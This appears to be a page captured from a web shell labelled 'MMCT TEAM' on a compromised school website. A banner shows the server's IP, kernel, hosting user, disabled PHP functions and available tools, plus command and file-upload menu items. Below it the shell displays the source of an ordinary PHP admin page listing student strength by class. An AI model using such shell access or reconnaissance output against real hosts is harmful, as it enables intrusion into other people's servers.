MMCT TEAM
Server IP : 86.38.243.181  /  Your IP : 216.73.216.51
Web Server : LiteSpeed
System : Linux in-mum-web1336.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
User : u986601745 ( 986601745)
PHP Version : 7.4.33
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u986601745/domains/emrskalsi.com/public_html/admin/tenderfiles/../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/u986601745/domains/emrskalsi.com/public_html/admin/tenderfiles/../student_strength.php
<?php include('include/sidebar.php'); ?>
<!-- Start Welcome area -->

<?php include('include/header.php'); ?>
<style>
    .table > thead > tr > th, .table > tbody > tr > th, .table > tfoot > tr > th, .table > thead > tr > td, .table > tbody > tr > td, .table > tfoot > tr > td {
        vertical-align: middle!important;
    }
</style>
<div class="breadcome-area">
    <div class="container-fluid">
        <div class="row">
            <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
                <div class="breadcome-list">
                    <div class="row">
                        <div class="col-lg-6 col-md-6 col-sm-6 col-xs-6">
                            <div class="breadcomb-wp">
                                <div class="breadcomb-icon">
                                    <i class="icon nalika-home"></i>
                                </div>
                                <div class="breadcomb-ctn">
                                    <h2>Student Strength</h2>
                                </div>
                            </div>
                        </div>
                        <div class="col-lg-6 col-md-6 col-sm-6 col-xs-6">

                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>
</div>

<div class="product-status mg-b-30">

    <div class="container-fluid">

        <div class="row">

            <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">

                <div class="product-status-wrap">

                    <h4>Student Strength List</h4>

                    <div class="add-product">

                        <a href="add_student_strength">Add</a>

                    </div>

                    <table id="example" class="table table-hover table-striped">
                        <thead>

                        <!-- <tr>

                            <th>S.NO</th>
                            <th>Class</th>
                            <th>Teacher Name</th>
                            <th>Girls Monitor</th>
                            <th>Boys Monitor</th>
                            <th>Boys</th>
                            <th>Girls</th>
                            <th>Total</th>
                            
                            <th>Action</th>

                        </tr> -->
                        <tr>
                            <td rowspan="2">S.NO.</td>
                            <td rowspan="2">Class</td>
                            <td rowspan="2">Name Of Class Teacher</td>
                            <td rowspan="2">Name Of Class Monitor</td>
                            <td colspan="2">Total Strength Of Students</td>
                            <td rowspan="2">Total</td>
                            <td rowspan="2">Action</td>

                        </tr>
                        <tr>
                            <td>Boys</td>
                            <td>Girts</td>
                        </tr>
                    </thead>
                    <?php
                    $q = "select student_strength.*,staff.name,class.class_name from student_strength left join staff on staff.id=student_strength.staff_id left join class on class.id=student_strength.class_id";
                    $query = mysqli_query($conn,$q);
                    $i=1;
                    while($res = mysqli_fetch_array($query)) {
                        $total=$res['boys']+$res['girls'];
                     ?>
                        <tr>
                            <td rowspan="2"><?php echo $i++; ?></td>
                            <td rowspan="2"><?php echo $res['class_name'] ?></td>
                            <td rowspan="2"><?php echo $res['name'] ?></td>
                            <td ><?php echo $res['girls_monitor'] ?></td>
                            <td rowspan="2"><?php echo $res['boys'] ?></td>
                            <td rowspan="2"><?php echo $res['girls'] ?></td>
                            <td rowspan="2"><?php echo $total; ?></td>
                            <td  rowspan="2">
                                <button data-toggle="tooltip" title="Edit" class="pd-setting-ed"><a style="color: #fff;" href="edit_student_strength?id=<?php echo $res['id'] ?>"><i class="fa fa-pencil-square-o" aria-hidden="true"></i></a></button>

                                <button onclick="del(<?php echo $res['id'] ?>)" data-toggle="tooltip" title="Trash" class="pd-setting-ed"><i class="fa fa-trash-o" aria-hidden="true"></i></button>

                            </td>
                        </tr>
                        <tr>
                            <td><?php echo $res['boys_monitor'] ?></td>
                        </tr>


                    </tr>
                <?php } ?>

            </table>

        </div>

    </div>

</div>

</div>

</div>
<script>
    function del(e) {
      var verify = confirm("Do you really want to delete!!!");
      if(verify) {
          $.ajax({
              url: "delete.php",
              type: "POST",
              data: {
                  student_strength_id: e,
              },
              success: function(response){
               location.reload();
           },
       })
      }
  }
</script>
<?php include('include/footer.php'); ?>

MMCT - 2023